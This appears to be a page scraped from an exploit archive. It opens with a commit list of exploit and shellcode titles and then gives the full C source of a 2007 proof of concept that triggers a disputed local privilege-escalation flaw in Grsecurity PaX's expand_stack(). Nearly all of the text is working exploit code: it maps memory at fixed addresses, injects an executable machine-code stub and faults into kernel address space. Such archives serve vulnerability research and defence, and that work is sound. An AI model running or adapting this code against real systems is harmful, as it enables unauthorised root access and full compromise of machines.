880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
103 lines
No EOL
2.7 KiB
C
103 lines
No EOL
2.7 KiB
C
/*
|
|
source: https://www.securityfocus.com/bid/22014/info
|
|
|
|
Grsecurity Kernel PaX is prone to a local privilege-escalation vulnerability.
|
|
|
|
An attacker can exploit this issue to obtain superuser privileges. A successful attack can result in the complete compromise of the affected computer.
|
|
|
|
NOTE: The vendor disputes the issue, stating that the application is not vulnerable.
|
|
|
|
Digital Armaments has provided an exploit and updated advisory outlining specific details of this vulnerability. Please see the reference section for further information.
|
|
*/
|
|
|
|
/*
|
|
** expand_stack() PaX local root vulnerability
|
|
** Vulnerability trigger.
|
|
**
|
|
** Copyright (C) 2007
|
|
** Digital Armaments Inc. - www.digitalarmaments.com
|
|
*/
|
|
|
|
#define _GNU_SOURCE
|
|
#include <unistd.h>
|
|
#include <signal.h>
|
|
#include <stdio.h>
|
|
#include <sched.h>
|
|
#include <fcntl.h>
|
|
#include <asm/page.h>
|
|
#include <sys/types.h>
|
|
#include <sys/stat.h>
|
|
#include <sys/mman.h>
|
|
#include <sys/wait.h>
|
|
|
|
#define KBASE 0xc0000000
|
|
#define SEGMEXEC_TASK_SIZE (KBASE / 2)
|
|
|
|
#define LOSTPAGE_SIZE (PAGE_SIZE * 3)
|
|
#define MAP1_BASE 0x00004000
|
|
#define MAP2_BASE MAP1_BASE - LOSTPAGE_SIZE
|
|
#define PF_BASE MAP1_BASE + SEGMEXEC_TASK_SIZE - 0x4000
|
|
|
|
#define PAGE_GROW_NB 10
|
|
|
|
static char ucode [40] = "\xbe\x00\xF0\xFF\x5F\x83\x3e\x2a";
|
|
|
|
void mouarf (int signum)
|
|
{
|
|
char * str = (char *) (MAP1_BASE + 600);
|
|
|
|
memset ((void *)(MAP1_BASE + 600), 0x90, 40);
|
|
str [26] = 0xc3; /* ret */
|
|
return;
|
|
}
|
|
|
|
int main( void )
|
|
{
|
|
int i = 1;
|
|
void (* p)();
|
|
|
|
signal (SIGBUS, mouarf);
|
|
|
|
if( mmap( (void *) MAP1_BASE, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED |
|
|
MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN, 0, 0 ) == (void *) -1 )
|
|
{
|
|
perror( "mmap map1 base\n" );
|
|
return( 1 );
|
|
}
|
|
|
|
if( mmap( (void *) 0x0, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED |
|
|
MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN, 0, 0 ) == (void *) -1 )
|
|
{
|
|
perror( "mmap 0x0 failed\n" );
|
|
return( 1 );
|
|
}
|
|
|
|
if( mprotect( (void *) MAP1_BASE, PAGE_SIZE,
|
|
PROT_READ | PROT_WRITE | PROT_EXEC ) < 0 )
|
|
{
|
|
perror( "mprotect map1 base" );
|
|
fprintf( stderr, "run chpax -m on this executable\n" );
|
|
return( 1 );
|
|
}
|
|
|
|
* (int *) (ucode + 1) = (SEGMEXEC_TASK_SIZE - (PAGE_SIZE * i));
|
|
memcpy ((void *)(MAP1_BASE + 600), ucode, 20);
|
|
p = (void *) MAP1_BASE + 600;
|
|
printf ("--> about to fault on %X\n", SEGMEXEC_TASK_SIZE - (PAGE_SIZE * i));
|
|
p ();
|
|
printf ("Overlaping the kernel by %d pages\n", i);
|
|
|
|
fflush( stdout );
|
|
|
|
printf ("Calling munmap ... %X, %x\n", 0x2000, 0x1000);
|
|
if (munmap (0x2000, 0x1000) < 0 )
|
|
perror ("munmap");
|
|
|
|
// printf ("Calling mremap ... \n");
|
|
// if (mremap (0x2000, 0x1000, 0x10000, MREMAP_MAYMOVE) < 0 )
|
|
// perror ("mremap");
|
|
|
|
printf ("PID:%d, sleeping\n", getpid ());
|
|
sleep (2000);
|
|
return( 0 );
|
|
} |